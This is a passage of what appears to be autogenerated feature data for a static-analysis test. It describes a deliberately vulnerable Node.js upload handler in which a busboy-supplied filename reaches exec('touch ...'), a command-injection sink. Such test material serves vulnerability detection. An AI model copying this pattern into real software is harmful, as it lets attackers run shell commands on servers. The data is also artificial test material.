mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:22:18 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:22:18 | this | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | 'arguments' object of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | exceptional return of anonymous function | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | exceptional return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | functio ... boy);\\n} | CalleeFlexibleAccessPath | http.createServer | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | functio ... boy);\\n} | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | functio ... boy);\\n} | calleeImports | http | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | functio ... boy);\\n} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | functio ... boy);\\n} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | functio ... boy);\\n} | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | functio ... boy);\\n} | receiverName | http | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | return of anonymous function | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:28:1 | return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:29:22:31 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:29:22:31 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:29:22:31 | req | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:29:22:31 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:29:22:31 | req | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:29:22:31 | req | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:29:22:31 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:29:22:31 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:29:22:31 | req | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:29:22:31 | req | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:34:22:36 | res | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:34:22:36 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:34:22:36 | res | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:34:22:36 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:34:22:36 | res | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:7:23:12 | busboy | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:7:23:12 | busboy | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:7:23:12 | busboy | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:7:23:12 | busboy | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:7:23:12 | busboy | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:7:23:51 | busboy | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:7:23:51 | busboy | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:7:23:51 | busboy | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:7:23:51 | busboy | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:7:23:51 | busboy | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:7:23:51 | busboy ... ders }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:7:23:51 | busboy ... ders }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:7:23:51 | busboy ... ders }) | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:7:23:51 | busboy ... ders }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:7:23:51 | busboy ... ders }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:16:23:51 | exceptional return of new Bus ... ders }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:16:23:51 | exceptional return of new Bus ... ders }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:16:23:51 | exceptional return of new Bus ... ders }) | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:16:23:51 | exceptional return of new Bus ... ders }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:16:23:51 | exceptional return of new Bus ... ders }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:16:23:51 | new Bus ... ders }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:16:23:51 | new Bus ... ders }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:16:23:51 | new Bus ... ders }) | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:16:23:51 | new Bus ... ders }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:16:23:51 | new Bus ... ders }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:20:23:25 | Busboy | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:20:23:25 | Busboy | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:20:23:25 | Busboy | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:20:23:25 | Busboy | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:20:23:25 | Busboy | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:27:23:50 | { heade ... aders } | CalleeFlexibleAccessPath | Busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:27:23:50 | { heade ... aders } | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:27:23:50 | { heade ... aders } | calleeImports | busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:27:23:50 | { heade ... aders } | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:27:23:50 | { heade ... aders } | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:27:23:50 | { heade ... aders } | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:27:23:50 | { heade ... aders } | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:27:23:50 | { heade ... aders } | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:29:23:35 | headers | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:29:23:35 | headers | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:29:23:35 | headers | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:29:23:35 | headers | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:29:23:35 | headers | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:29:23:48 | headers: req.headers | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:29:23:48 | headers: req.headers | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:29:23:48 | headers: req.headers | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:29:23:48 | headers: req.headers | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:29:23:48 | headers: req.headers | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:29:23:48 | headers: req.headers | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:29:23:48 | headers: req.headers | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:29:23:48 | headers: req.headers | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:29:23:48 | headers: req.headers | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:29:23:48 | headers: req.headers | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:38:23:40 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:38:23:40 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:38:23:40 | req | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:38:23:40 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:38:23:40 | req | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:38:23:48 | req.headers | CalleeFlexibleAccessPath | Busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:38:23:48 | req.headers | InputAccessPathFromCallee | ?.headers | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:38:23:48 | req.headers | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:38:23:48 | req.headers | assignedToPropName | headers | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:38:23:48 | req.headers | calleeImports | busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:38:23:48 | req.headers | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:38:23:48 | req.headers | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:38:23:48 | req.headers | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:38:23:48 | req.headers | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:38:23:48 | req.headers | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:42:23:48 | headers | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:42:23:48 | headers | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:42:23:48 | headers | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:42:23:48 | headers | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:23:42:23:48 | headers | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:24:8 | busboy | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:24:8 | busboy | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:24:8 | busboy | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:24:8 | busboy | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:24:8 | busboy | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:24:11 | busboy.on | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:24:11 | busboy.on | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:24:11 | busboy.on | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:24:11 | busboy.on | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:24:11 | busboy.on | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:26:4 | busboy. ... OK\\n }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:26:4 | busboy. ... OK\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:26:4 | busboy. ... OK\\n }) | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:26:4 | busboy. ... OK\\n }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:26:4 | busboy. ... OK\\n }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:26:4 | exceptional return of busboy. ... OK\\n }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:26:4 | exceptional return of busboy. ... OK\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:26:4 | exceptional return of busboy. ... OK\\n }) | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:26:4 | exceptional return of busboy. ... OK\\n }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:3:26:4 | exceptional return of busboy. ... OK\\n }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:10:24:11 | on | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:10:24:11 | on | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:10:24:11 | on | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:10:24:11 | on | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:10:24:11 | on | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:13:24:18 | 'file' | CalleeFlexibleAccessPath | busboy.on | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:13:24:18 | 'file' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:13:24:18 | 'file' | calleeImports | busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:13:24:18 | 'file' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:13:24:18 | 'file' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:13:24:18 | 'file' | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:13:24:18 | 'file' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:13:24:18 | 'file' | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:13:24:18 | 'file' | receiverName | busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:24:20 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:24:20 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:24:20 | exec | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:24:20 | exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:24:20 | exec | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:24:20 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:24:20 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:24:20 | this | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:24:20 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:24:20 | this | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | 'arguments' object of anonymous function | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | 'arguments' object of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | exceptional return of anonymous function | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | exceptional return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | functio ... OK\\n } | CalleeFlexibleAccessPath | busboy.on | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | functio ... OK\\n } | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | functio ... OK\\n } | calleeImports | busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | functio ... OK\\n } | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | functio ... OK\\n } | contextSurroundingFunctionParameters | (req, res)\n(fieldname, file, filename, encoding, mimetype) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | functio ... OK\\n } | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | functio ... OK\\n } | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | functio ... OK\\n } | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | functio ... OK\\n } | receiverName | busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | return of anonymous function | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:21:26:3 | return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:31:24:39 | 